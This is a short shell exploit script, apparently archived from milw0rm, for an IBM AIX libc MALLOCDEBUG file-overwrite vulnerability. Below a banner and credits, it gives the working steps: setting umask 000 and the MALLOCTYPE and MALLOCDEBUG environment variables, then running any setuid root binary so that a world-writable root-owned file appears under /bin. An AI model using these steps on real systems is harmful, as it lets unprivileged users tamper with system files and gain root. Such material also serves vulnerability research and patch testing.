#!/bin/bash
#################################################################
# _______ _________ _ #
# ( ____ )\__ __/( ( /| #
# | ( )| ) ( | \ ( | #
# | (____)| | | | \ | | #
# | __) | | | (\ \) | #
# | (\ ( | | | | \ | #
# | ) \ \__ | | | ) \ | #
# |/ \__/ )_( |/ )_) #
# http://root-the.net #
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability #
#[+] Refer : securitytracker.com/id?1022261 #
#[+] Exploit : Affix <root@root-the.net> #
#[+] Tested on : IBM AIX #
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
# str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull #
# AIX 5.3 ML 5 is where this bad libc code was added. #
# Libs Affected : #
# /usr/ccs/lib/libc.a #
# /usr/ccs/lib/libp/libc.a #
#################################################################
Set the following environment variables:
umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename
echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."
# milw0rm.com [2009-07-30]